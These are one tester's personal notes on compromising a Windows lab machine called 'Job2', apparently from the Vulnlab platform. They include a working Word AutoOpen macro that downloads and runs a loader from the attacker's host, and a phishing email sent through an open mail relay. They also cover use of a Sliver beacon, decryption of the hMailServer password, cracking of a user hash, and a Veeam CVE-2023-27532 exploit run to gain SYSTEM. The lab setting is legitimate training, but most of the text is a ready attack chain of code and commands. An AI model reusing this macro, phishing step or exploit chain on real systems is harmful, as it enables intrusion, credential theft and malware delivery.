Job2
This is not a writeup, just my notes about the machine.
Machine information
Operating System: Windows 2016
Chain: False (standalone compromise)
Credentials
Username
Password
Method
Scope
Mailserver Administrator
MailAdm1n2023
hMailServer
95C02068FD5D
Decrypt hash
Database for hMailServer
Ferdinand
Franzi123!
Extracted from Database
Local User
✅ Valid Usernames
Ferdinand🔑 Passwords list
MailAdm1n2023
95C02068FD5D
Franzi123!Information Gathering
22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_8.1 (protocol 2.0)
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp open rpcbind syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp open microsoft-ds? syn-ack ttl 127
1063/tcp open rpcbind syn-ack ttl 127
2049/tcp open rpcbind syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal ServicesService enumeration
SMTP
The service is vulnerable to Open Relay, which means any unauthenticated user can send emails through it
❯ nmap -p25 -Pn --script smtp-open-relay 10.10.95.231
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 15:34 EDT
Nmap scan report for 10.10.95.231
Host is up (0.16s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)HTTPS (www.job2.vl)
Possible Attack Path: If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document. We look forward to hearing from you!
Initial Access
During the assessment, the tester configured a Sliver server and generated a beacon named http-vulnlabs-4444.exe for use throughout the assessment.
Setting up Macro for MS Word
It was discovered AV Engine running into the system blocking everything. The tester proceeded to use to bypass and obtain a reverse shell.
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
ByVal lpCmdLine As String, _
ByVal uCmdShow As Long) As Long
Sub AutoOpen()
URLDownloadToFileA 0, "http://10.8.5.48/Loader.exe", "C:\Windows\system32\spool\drivers\color\Loader.exe", 0, 0
WinExec "C:\Windows\system32\spool\drivers\color\Loader.exe", SHOW_HIDE
End Sub
Sending the malicious file via sendemail tool
❯ sendemail -t hr@job2.vl -f john.smith@gmail.com -a pay.doc -u "Subject: Appliction Resume" -s 10.10.89.165 -v
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.
May 06 18:25:35 kali sendemail[185144]: Message input complete.
May 06 18:25:35 kali sendemail[185144]: DEBUG => Connecting to 10.10.89.165:25
May 06 18:25:35 kali sendemail[185144]: DEBUG => My IP address is: 10.8.5.48
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 220 JOB2 ESMTP
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: EHLO kali
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 250-JOB2, 250-SIZE 20480000, 250-AUTH LOGIN, 250 HELP
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: MAIL FROM:<john.smith@gmail.com>
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 250 OK
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: RCPT TO:<hr@job2.vl>
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 250 OK
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: DATA
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 354 OK, send.
May 06 18:25:36 kali sendemail[185144]: INFO => Sending message body
May 06 18:25:36 kali sendemail[185144]: Setting content-type: text/plain
May 06 18:25:36 kali sendemail[185144]: DEBUG => Sending the attachment [pay.doc]
May 06 18:25:38 kali sendemail[185144]: SUCCESS => Received: 250 Queued (1.484 seconds)
May 06 18:25:38 kali sendemail[185144]: Email was sent successfully! From: <john.smith@gmail.com> To: <hr@job2.vl> Subject: [Subject: Appliction Resume] Attachment(s): [pay.doc] Server: [10.10.89.165:25]
Lateral movement to Ferdinand
Performing Situational Awarness
sliver (http-vulnlabs-4444) > sa-whoami
[*] Successfully executed sa-whoami (coff-loader)
[*] Got output:
UserName SID
====================== ====================================
JOB2\Julian S-1-5-21-3935782767-3829597994-1046841959-1000
GROUP INFORMATION Type SID Attributes
================================================= ===================== ============================================= ==================================================
JOB2\None Group S-1-5-21-3935782767-3829597994-1046841959-513 Mandatory group, Enabled by default, Enabled group,
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group,
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group,
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group,
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group,
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group,
Mandatory Label\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group,
Privilege Name Description State
============================= ================================================= ===========================
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
sliver (http-vulnlabs-4444) > Enumerating the security solutions
sliver (http-vulnlabs-4444) > execute -o cmd "/c powershell Get-MPComputerStatus | findstr True"
[*] Output:
AMServiceEnabled : True
AntispywareEnabled : True
AntivirusEnabled : True
BehaviorMonitorEnabled : True
IoavProtectionEnabled : True
IsVirtualMachine : True
NISEnabled : True
OnAccessProtectionEnabled : True
QuickScanOverdue : True
RealTimeProtectionEnabled : True
sliver (http-vulnlabs-4444) >
Discovering an unusual installed software
sliver (http-vulnlabs-4444) > ls
C:\Progra~2 (25 items, 174 B)
=============================
drwxrwxrwx AWS SDK for .NET <dir> Wed Apr 12 03:24:57 +0000 2023
drwxrwxrwx AWS Tools <dir> Wed Apr 12 03:24:57 +0000 2023
drwxrwxrwx Common Files <dir> Wed May 03 18:47:14 +0000 2023
-rw-rw-rw- desktop.ini 174 B Sat May 08 08:18:31 +0000 2021
drwxrwxrwx hMailServer <dir> Wed May 03 13:48:57 +0000 2023
drwxrwxrwx Internet Explorer <dir> Wed Dec 15 04:19:46 +0000 2021
drwxrwxrwx LINQPad5 <dir> Wed May 03 14:05:02 +0000 2023
drwxrwxrwx Microsoft <dir> Thu Aug 19 06:41:12 +0000 2021
drwxrwxrwx Microsoft Office <dir> Wed May 03 15:15:38 +0000 2023
drwxrwxrwx Microsoft OneDrive <dir> Tue May 02 21:20:00 +0000 2023
drwxrwxrwx Microsoft SQL Server <dir> Wed May 03 18:15:45 +0000 2023
drwxrwxrwx Microsoft SQL Server Compact Edition <dir> Wed May 03 14:08:26 +0000 2023
drwxrwxrwx Microsoft Synchronization Services <dir> Wed May 03 13:49:01 +0000 2023
drwxrwxrwx Microsoft Visual Studio 14.0 <dir> Wed May 03 18:11:58 +0000 2023
drwxrwxrwx Microsoft.NET <dir> Wed May 03 18:15:54 +0000 2023
drwxrwxrwx MSBuild <dir> Wed May 03 13:43:58 +0000 2023
drwxrwxrwx Reference Assemblies <dir> Wed May 03 13:43:58 +0000 2023
drwxrwxrwx Veeam <dir> Wed May 03 18:47:42 +0000 2023
drwxrwxrwx Windows Defender <dir> Sat May 08 09:35:34 +0000 2021
drwxrwxrwx Windows Mail <dir> Wed Mar 15 06:46:55 +0000 2023
drwxrwxrwx Windows Media Player <dir> Wed Jul 13 08:03:39 +0000 2022
drwxrwxrwx Windows NT <dir> Sat May 08 09:35:34 +0000 2021
drwxrwxrwx Windows Photo Viewer <dir> Thu Feb 10 00:28:44 +0000 2022
drwxrwxrwx Windows Sidebar <dir> Sat May 08 08:34:49 +0000 2021
drwxrwxrwx WindowsPowerShell <dir> Sat May 08 08:34:49 +0000 2021
sliver (http-vulnlabs-4444) > LINQPad 5is a powerful software utility specifically designed for .NET Framework 4.6 development, allowing developers to interactively query SQL databases and write C# code without needing a full IDE.hMailServeris a free, open source, e-mail server for Microsoft Windows. It's used by Internet service providers, companies, governments, schools and enthusiasts in all parts of the world.Veeamis a software company specializing in data protection, backup, and disaster recovery solutions for various workloads, including virtual, physical, cloud-based, and SaaS environments
Discovering a credentials in Julian's Desktop
sliver (http-vulnlabs-4444) > ls
C:\Users\Julian\Desktop (3 items, 2.8 KiB)
==========================================
-r--r--r-- creds.txt 39 B Wed May 03 15:38:10 +0000 2023
-rw-rw-rw- desktop.ini 282 B Wed May 03 16:28:26 +0000 2023
-rw-rw-rw- Word 2016.lnk 2.5 KiB Thu May 04 10:43:29 +0000 2023
sliver (http-vulnlabs-4444) > cat creds.txt
Mailserver Administrator: MailAdm1n2023Credentials found: Mailserver Administrator: MailAdm1n2023
Obtaining the hMailServer configuration file
sliver (http-vulnlabs-4444) > cat hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=8a53bc0c0c9733319e5ee28dedce038e
[Database]
Type=MSSQLCE
Username=
Password=4e9989caf04eaa5ef87fd1f853f08b62
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
sliver (http-vulnlabs-4444) >
Hash found: 4e9989caf04eaa5ef87fd1f853f08b62
Downloading Database file
sliver (http-vulnlabs-4444) > download hMailServer.sdf
[*] Wrote 675840 bytes (1 file successfully, 0 files unsuccessfully) to /home/Intrusionz3r0/Documents/Sliver/hMailServer.sdfDecrypting database password
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/hmailserver_password.exe
[*] Wrote file to C:\Temp\hmailserver_password.exe
sliver (http-vulnlabs-4444) > execute -o hmailserver_password.exe dec 4e9989caf04eaa5ef87fd1f853f08b62
[*] Output:
95C02068FD5D
sliver (http-vulnlabs-4444) >
Password: 95C02068FD5D
Extracting user's hashes from Database
Software: LINQPad5Setup.exe
Dependencies: Microsoft SQL Server Compact 3.5
How to open SDF files: https://stackoverflow.com/questions/2375118/how-to-open-sdf-files
Bruteforcing and obtaining Ferdinand's Password
❯ hashid 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11
Analyzing '04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11'
[+] hMailServer
❯ hashcat -m 1421 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11 /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11:Franzi123!Ferdinand@job2.vl: Franzi123!
Privilege Escalation to NT Authority Syste
Lateral movement to Ferdinand user
sliver (http-vulnlabs-4444) > make-token --username Ferdinand -p 'Franzi123!' -T LOGON_NETWORK
[*] Successfully impersonated \Ferdinand. Use `rev2self` to revert to your previous token.
sliver (http-vulnlabs-4444) > whoami
Logon ID: JOB2\Julian
[*] Current Token ID: JOB2\Ferdinand
sliver (http-vulnlabs-4444) > Obtaining the vulnerable Veeam version
Exploit: CVE-2023-27532
sliver (http-vulnlabs-4444) > execute -o cmd '/c powershell Get-Package | findstr Veeam'
[*] Output:
Veeam Backup & Replication 10.0.1.4854Uploading the exploit and dependencies.
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/VeeamHax.exe
[*] Wrote file to C:\Temp\VeeamHax.exe
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Interaction.MountService.dll
[*] Wrote file to C:\Temp\Veeam.Backup.Interaction.MountService.dll
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Model.dll
[*] Wrote file to C:\Temp\Veeam.Backup.Model.dll
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Common.dll
[*] Wrote file to C:\Temp\Veeam.Backup.Common.dllExploit vulnerability to obtain a shell as NT Authority System
sliver (http-vulnlabs-4444) > execute VeeamHax.exe --target 127.0.0.1 --cmd "C:\Windows\system32\spool\drivers\color\Loader.exe"
Last updated